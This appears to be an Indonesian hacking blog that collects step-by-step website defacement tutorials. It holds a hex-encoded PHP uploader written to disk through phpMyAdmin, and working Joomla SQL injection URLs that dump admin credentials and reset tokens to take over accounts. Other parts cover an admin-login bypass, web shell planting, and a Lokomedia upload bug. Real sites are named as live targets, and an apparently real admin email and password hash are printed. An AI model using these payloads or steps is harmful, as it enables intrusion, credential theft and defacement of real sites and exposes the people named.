Sesusai dgn judul nya tanam Shell melalui phpmyadmin, banyak yang post trick yang sama judulnya, tapi ini sebenarnya cara yang berbeda, karena trick yang lama 100% sudah tidak bisa jalan, dan trik ini pun hanya pernah saya coba pada server windows, tanpa harus melakukan kegiatan yang panjang dengan mencari bugs, cari table password dll, ini hanya menggunakan bantuan google untuk bisa menemukan web yang phpmyadmin nya terbuka dengan menggunakan Dork andalan anda.

saya tidak perlu menjelaskan apa itu Dork, karena itu sudah umum dalam dunia hacking, tapi saya bukan seorang Hacker maupun Lamers. hanya suka berbagi untuk kawan" saja.. ok langsung ja kitasediakan kopi dan sekarang beraksi.. cieee macam apa ja...

anggap saja anda telah menemukan phpmyadmin target.. silahkan anda klik Query yang ada garis berwarna hitam di gambar di bawah ini, kemudian copas script ini ke dalam garis yg berwarna merah seperti digambar di bawah...
[Image: untitl10.jpg]
Quote:select 0x3c3f706870206563686f20223c666f726d206d6574686f643d27504f53542720656e6374797065 ​ 3d276d756c7469706172742f666f726d2d64617461273e3c696e70757420747970653d2766696c65 ​ 27206e616d653d2766696c656c65272073697a653d273434273e3c696e70757420747970653d2773 ​ 75626d6974273e3c2f666f726d3e223b40636f707928245f46494c45535b2766696c656c65275d5b ​ 27746d705f6e616d65275d2c245f46494c45535b2766696c656c65275d5b276e616d65275d293b3f ​3e into outfile 'c:/xampp/htdocs/upload.php'

Kemudian klik GO yang da gambar garis merah di gambar di atas.. tersenyum lebar
Maka nanti akan terupload script yang tadi dengan nama upload.php, kemudian kita tinggal meng akses nya..
contoh: http://www.namasite.com/upload.php

maka akan ada tempat upload yg tampil di situ, kemudian tnggal mengupload shell kita ke dalam site tersebut, misal nya nama shell nya b374k.php <<== maka jika sukses di upload kita tinggal memanggil nya
contoh : http://www.namasite.com/b374k.php
siap deh... mau di apain site tu terserah kamu..
 
sumber :http://forum.act-crew.org

Read More

Sunday, March 24, 2013

Exploit Joomla terbaru part 2

 dork : inurl:"option com_artforms"

[2] Exploit : /index.php?option=com_artforms&task=vferforms&id=1+UNION+SELECT+1,2,3,version(),5,concat_ws(email,0x3a,username,0x3a,password)+from+jos_users--

[3] Reset Password : /index.php?option=com_user&view=reset

[4] Exploit Token : /index.php?option=com_artforms&task=vferforms&id=1+UNION+SELECT+1,2,3,version(),5,concat_ws(username,0x3a,activation)+from+jos_users--

[5] login admin : /administrator

assalamualaikum saya kali ini mau share tentang exploit joomla com_artforms karna saya suka dengan exploit ini
jangan takut karna exploit ini masih bisa di gunakan sampai sekarang :) toturial ini sangat simple dan totur ini sering
saya pakai untuk deface website dengan exploit yang 1 ini
ok tanpa basa basi aja ya :) sekarang buka google dan ketik dork di atas
Dork : inurl:"option com_artforms"
bisa juga menggunakan dengan mirc :D bagi yang tau ya saya di sini suka manual karna saya jarang main mirc :D
ok sekarang kita dapat target contoh target di sini saya mendapat kan ini http://www.avaclean.com/
target : http://www.avaclean.com/
dan sekarang kita buka web target tadi
contoh : http://www.avaclean.com/ dan sekarang coba pasang exploit no 2 tadi

dengan contoh seperti ini :

http://www.avaclean.com//index.php?option=com_artforms&task=vferforms&id=1+UNION+SELECT+1,2,3,version(),5,concat_ws(email,0x3a,username,0x3a,password)+from+jos_users--

dan hasil nya akan seperti ini

josh@bkmediagroup.comadminjosh@bkmediagroup.com:josh@bkmediagroup.com4fffa8274459e218833756e3149ab20d:jWtEsQNqFQPZchh86wvmnO3XIlTOwZ9P

dan sekarang kita coba open tab untuk mereset password nya
contoh :
http://www.avaclean.com//index.php?option=com_user&view=reset

dan sekarang masukan email tersebut
josh@bkmediagroup.com

ok nanti dia akan meminta token uppzzz jangan senang dulu sekarang kita coba cari token dengan memakai exploit no 4
contoh :
http://www.avaclean.com//index.php?option=com_artforms&task=vferforms&id=1+UNION+SELECT+1,2,3,version(),5,concat_ws(username,0x3a,activation)+from+jos_users--

dan hasil nya akan menjadi seperti ini
admineda7d6142fac40a533b56407a4617371

ok sekarang kita kembali ke reset password tadi kan tadi minta token sekarang kita liat code yang barusan tadi
ok kita dapat seperti ini : admineda7d6142fac40a533b56407a4617371 <== yang mana code token nya ?? ok sekarang saya jelas kan

code : [admin]eda7d6142fac40a533b56407a4617371
yang saya kasih dalam tanda kurung itu adalah user nya
nah sekarang coba kita ambil code ini : eda7d6142fac40a533b56407a4617371
dan itu adalah token nya :) ok binggo sekarang user sudah ke reset tinggal masukan password baru aja :D
selamat sekarang anda menjadi admin
untuk joomla login ada biasa nya
contoh login admin : http://localhost/administrator
dan sekarang coba kita masukan dengan user yang tadi kalian dapat dan password baru yang kalian buat tadi :)

# update
untuk code token sekarang kalau untuk manual kebanyakan biasa nya memakai tanda $$$ contoh token yang tidak bisa di reset seperti ini
:admin39e2d1bd5f899df5c15ac35abb9bc977:$1$c8b6c03c$

dan bila kalian menemukan bagian seperti ada tanda $1$c8b6c03c$ tidak bisa di reset password
ok sekian dulu toturial dari saya salam selalu
mohon maaf bila ada salah yang saya berikan ini :) assalamualaikum :)
Read More

Exploit Joomla terbaru part 1

Exploit Joomla option=com_ignitegallery

======

=step1=

======

coba kita cari di google dengan dork ini :

inurl:"index.php option=com_ignitegallery"
  
======

=step2=

======

pasang exploitnya

exploit :

index.php?option=com_ignitegallery&task=view&gallery=-4+union+all+select+1,2,group_concat(id,0x3a,name,0x3a,username,0x3a,email,0x3a,password,0x3a,usertype),4,5,6,7,8,9,10+from+jos_users--
  
contoh :

http://www.kaikourafishing.co.nz/index.php?option=com_ignitegallery&task=view&gallery=-4+union+all+select+1,2,group_concat%28id,0x3a,name,0x3a,username,0x3a,email,0x3a,password,0x3a,usertype%29,4,5,6,7,8,9,10+from+jos_users--

nah muncul kan tuh :D
  
======

=step3=

======

coba kita reset password nya

sekarang kita reset password dengan menggunakan exploit ini :

/index.php?option=com_user&view=reset

 hm.. minta email dia.. masukin aja email admin tadi..

enter deh :D

  
======

=step4=

======

wah minta activation pula, tenang kita cari dulu
activationnya :D

exploit :

index.php?option=com_ignitegallery&task=view&gallery=-4+union+all+select+1,2,group_concat(id,0x3a,name,0x3a,username,0x3a,email,0x3a,password,0x3a,activation),4,5,6,7,8,9,10+from+jos_users--

 tuh kan kluar activatifasinya :D

  
======

=step5=

======

copas aja ke yang tadi lalu enter :D

  
======

=step6=

======

sekarang meminta password baru :D

  
======

=step7=

======

oke langsung ke taham berikutnya, sekarang kita masuk ke
adminnya

http://www.kaikourafishing.co.nz/administrator/


Read More

Thursday, March 21, 2013

exploit Joomla! v1.5.6

eset password Admin!

Admin Password Reset

Pergi ke:http://www.site.com/index.php?option=com_user&view=resetIni adalah standar Joomla! query untuk permintaan reset password


joomla hackLupa Password Anda? Halaman akan memuat.Dalam E-mail Address: masukkan email admin (dalam kasus kami itu adalah: info@site.com) dan tekan Submit.Jika Anda menemukan email yang tepat admin, Konfirmasikan akun Anda. halaman akan memuat, meminta Token:
Mencari Token
Untuk menemukan tanda kembali ke reiluke SQLiHelper 2,7 dan username sampah dan aktivasi dari jos153_users Nama Kolom
username: adminaktivasi: 5482dd177624761a290224270fa55f1d
5482dd177624761a290224270fa55f1d adalah 32 Token verivikasi char, masuk dan pres Kirim.
joomla hackJika Anda melakukan semuanya ok, Istirahatkan halaman Password akan memuat. Masukkan password baru anda ...
Setelah itu pergi ke:http://www.site.com/administrator/Standar Joomla konten portal sistem manajemen
Masukkan admin username dan password Anda, klik LoginPergi ke Extensions >> Template Manager >> default Template Nama >> Edit HTMLDalam Editor Template HTML memasukkan kode dirusak Anda, klik Terapkan, Simpan dan Anda selesai!
joomla hackUntuk membuat hidup lebih sengsara admin, klik admin di jendela Joomla utama dan di halaman Rincian Pengguna perubahan E-mail admin
joomla hack
Berbagi Link dan Membuat tutorial ini hidup!Cheers!
Read More

bypass

Dork: inurl:/index_info.php     Lihat Dork yg lain Disini
Live Target : http://niche-marketplace.net/index_info.php

Note: "Mohon Live Target Jangan Dirusak, karena untuk pembelajaran bersama, kalo udah bisa cari aja target yang lain!"

Langkah Langkahnya:

Cari Target Google.com dengan menggunakan Dork, disini ane dapet target http://niche-marketplace.net/index_info.php



Lalu masuk ke halaman login admin! biasanya letaknya site.com/admin/index.php atau bisa jadi site.com/[path]/admin/index.php kalo target ane : http://niche-marketplace.net/admin/index.php


Setelah itu kita lakukan Inspect Elemen! dengan cara klik kanan, lalu pilih Inspect Element!



 Lalu akan muncul seperti gambar dibawah! yang perlu kita lakukan adalah mencari Source code berikut :


 Ganti "hidden" dengan "text" lalu akan muncul kotak label "admin_settings_read" ganti read menjadi write! lihat gambar!


Lalu tekan Enter!


Klik Login aja!

Note: "Kalo ada muncul pesan seperti digambar, berarti target vuln ato bisa di depes! Selain itu ga bisa, cari target lain! :p




Oke, sekarang kita udah masuk ke halaman admin, saatnya kita tanem Shell! 

WAJIB!!! Harap diperhatikan dan dicermati baik baik, jika ada sedikit kesalahan maka Shell sobat yg ditanem akan Gagal dieksekusi! dan akhirnya balik maning ke awal :p

Pertama gulirkan kebawah! cari menu "Add/Remove Navigation Page"




Klik Add/Remove Navigation Page! Lalu ketik nama shell.php sobat, kalo ane mah "idca.php". Untuk lebih jelasnya liat gambar!


 Lalu klik "Add New Navigation"


Setelah itu masih dihalaman yg sama, liat kebawah sampai menemukan kalimat: "Sort Page Buttons/links" trus ubah "idca.php.html" jadi "/idca.php". liat gambar!



Lalu klik "Sort Navigation Pages"!

Selanjutnya cari Menu "Edit Navigation Pages" lalu klik menu tersebut. Kemudian pada kolom "Please Select a Pages To Edit" lalu pilih "idca.php.html". disini kita akan melakukan Inspect Element lagi, lalu cari kata "idca.php.html" dan ubah jadi "idca.php".  Lihat gambar!


Kemudian masih dihalaman yg sama, gulirkan kebawah!

Pada kolom "Enter A Page Title As You Would Like To Be Seen" ketik "idca.php"

Pada kolom "URL For This Site" ketik "main_pages/idca.php"

Pada kota box, ceklis/centang ketiganya. untuk lebih jelas, lihat gambar!



Selanjutnya masih juga di halaman yg sama, gulirkan kebawah! Pada kolom "Enter Content for Your Pages" pilih "Source" lalu editor akan aktif!

Buka shell Backdoor (madspotshell.php) dengan notepad untuk dipaste kan ke Konten Pages!



WAJIB DIPERHATIKAN, karena menentukan keberhasilan!

Sebaiknya Shell Backdoor jangan diberi password!


Jadi nanti seperti ini cara nulisnya.

<Line kosong>
<Line kosong>
{ Isi Kodingan PHP Shell dari awal sampai akhir }
<Line kosong>
<Line kosong>

Yap di Line awal diisikan ruang kosong 2x (alias teken enter 3x) dan di Line akhir diisikan ruang kosong 2x (alias teken enter 3x). Kurang jelas? lihat gambar :


 lalu


Lalu klik Save! akan muncul pesan seperti gambar berikut!


Selanjutnya saatnya kita buka shell backdoor yg udah kita tanem! caranya tulis diadress bar: http://site.com/main_pages/Nama File Backdoor.php Liat gambar!



Huft! Akhirnya Selesai dan Berhasil tuh! Tinggal tebas index aja! wkwkwk

Harap Live Target ini jangan di Tebas om! Buat aja file baru!Atau Cari Target Lain!

sumber: http://indocyberarmy.blogspot.com/2013/03/cara-mudah-deface-website-dengan-free.html
Read More

Bug lokomedia

Deface Web Dengan lokomedia – Kali ini kami ingin ngasi tau cara Defaceweb . Dengan teknik LOKOMEDIA ..

Memang banyak web yang sudah tau tehnik ini dan segera patch web mereka, tapi ada beberapa web juga yang gak update dengan perkembangan h*cker diluar sana .

Sebelumnya saya peringatkan bahwa saya tidak akan menanggung resiko yang kalian buat diluar sana.





Dork = allinurl:media.php?module=berita << Banyak WEB INDO nya

Sebagai contoh saya ambil website

http://dahli*********.com (cencored)



1.Cari halaman login admin nya, Download software pencari halaman login , Klik Disini



2.Setelah kita tau halaman login admin nya lalu kita tambahkan

/content.php?module=banner



Menjadi



http://dahli*********.com/admin/content....ule=banner

#/admin/ diatas ialah halaman login adminnya (Tidak semua web halaman loginnya seperti itu)

#/content.php?module=banner adalah tempat kita mulai beraksi



3.Lalu ketika masuk ke url http://dahli*********.com/admin/content....ule=banner Disitu kita klik tombol tambah banner



4.kemudian , isi kolom sesuai permintaan dan kolom link tidak usah diisi , kolom nama terserah mau apa aja , lalu yang terakhir isi dengan shell agan



#Shell adalah suatu script menyerupai file manager , kita bisa merubah apapun didalam filemanager asal permissionnya di ijinkan #Download shell di google



5.nah untuk ngecek apakah shell kita work atau nggak silahkan buka

http://dahli********.com/admin/foto_berita/shell.php



6. kalau berhasil terbuka berarti kita tinggal masuk dalam web shell kita dan jangan lupa pindahkan web shell nya ke folder web yang cukup aman biar web shell kita awet dan langgeng tertanam di website tersebut.



7. tinggal ganti index.php nya ajah deh kalau mau tega – tegaan mah

Selesai dah.
Read More

pendapat ada tentang blog ini ?

 
bloger hat © 2013 Templates | imamkenteng